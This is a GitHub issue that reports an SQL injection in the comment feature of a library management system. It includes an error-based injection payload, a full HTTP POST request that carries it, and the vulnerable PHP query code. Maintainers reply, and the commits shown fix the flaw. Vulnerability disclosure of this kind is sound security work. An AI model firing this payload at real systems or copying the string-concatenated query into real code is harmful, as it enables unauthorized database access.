Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Security Bugs] Sql Injection #123

Closed
qmss opened this issue Dec 22, 2021 · 1 comment
Closed

[Security Bugs] Sql Injection #123

qmss opened this issue Dec 22, 2021 · 1 comment
Labels
bug Something isn't working

Comments

@qmss
Copy link

qmss commented Dec 22, 2021

SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks.
Ordinary user login "find a book" SQL injection attack in the comments (example:'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1
)
5
6

`SQL Injection request:
POST /index.php?p=show_detail&id=17 HTTP/1.1
Host: 192.168.31.63
Content-Length: 110
Cache-Control: max-age=0
Origin: http://192.168.31.63
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3; q=0.9
Referer: http://192.168.31.63/index.php?p=show_detail&id=17
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9
Connection: close

comment='and//1=(updatexml(1,concat(0x3a,(select//user())),1))//and//'1'='1
&SaveComment=Save+comment`

`Vulnerable code:
$_sql = "Select c.comment, m.member_name, c.input_date from comment AS c
LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
LEFT JOIN member AS m ON m.member_id = c.member_id
WHERE b.biblio_id =".$_detail_id.
"ORDER BY c.last_update DESC";
$commlist = $dbs->query($_sql);
if ($commlist) {
$_all_recs = $commlist->num_rows;
}
if ($_all_recs >0) {
$_page = ($page -1) * $_recs_each_page;
$_sql .= "Limit". $_page. ", ". $_recs_each_page;
$commlist = $dbs->query($_sql);
$_list_comment .='

'. $_all_recs. __(' comments available').'
';
while ($_data = $commlist->fetch_assoc()) {
$_list_comment .='
';
$_list_comment .='
'.$_data['member_name']. __(' at'). $_data['input_date']. __(' write').'</ div>';
$_list_comment .='
'. $_data['comment'].'
';
$_list_comment .='
';
}
$_list_comment .='
'.simbio_paging::paging($_all_recs, $_recs_each_page, $int_pages_each_set = 10,'','_self').'
';
}

if (ISSET($_SESSION['mid'])) {
// Comment form
$_forms ='

';
$_forms .= simbio_form_element::textField('textarea','comment','','placeholder="Add your comment" class="comment-input form-control"').'
';
$_forms .='';
$_forms .= \Volnix\CSRF\CSRF::getHiddenInputString();
$_forms .='';
return $_list_comment.$_forms;`
@qmss qmss added the bug Something isn't working label Dec 22, 2021
@drajathasan
Copy link
Collaborator

I appreciate your report. But, if you can report some vulnerability code, why you didn't create pull request?

idoalit pushed a commit that referenced this issue Oct 5, 2022
@drajathasan
Fix Sql Injection at comment content #123
c3bb857
hasanbasri1993 pushed a commit to hasanbasri1993/slims9_bulian that referenced this issue Jan 14, 2023
@drajathasan @hasanbasri1993
Fix Sql Injection at comment content slims#123
f79897a
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@qmss @drajathasan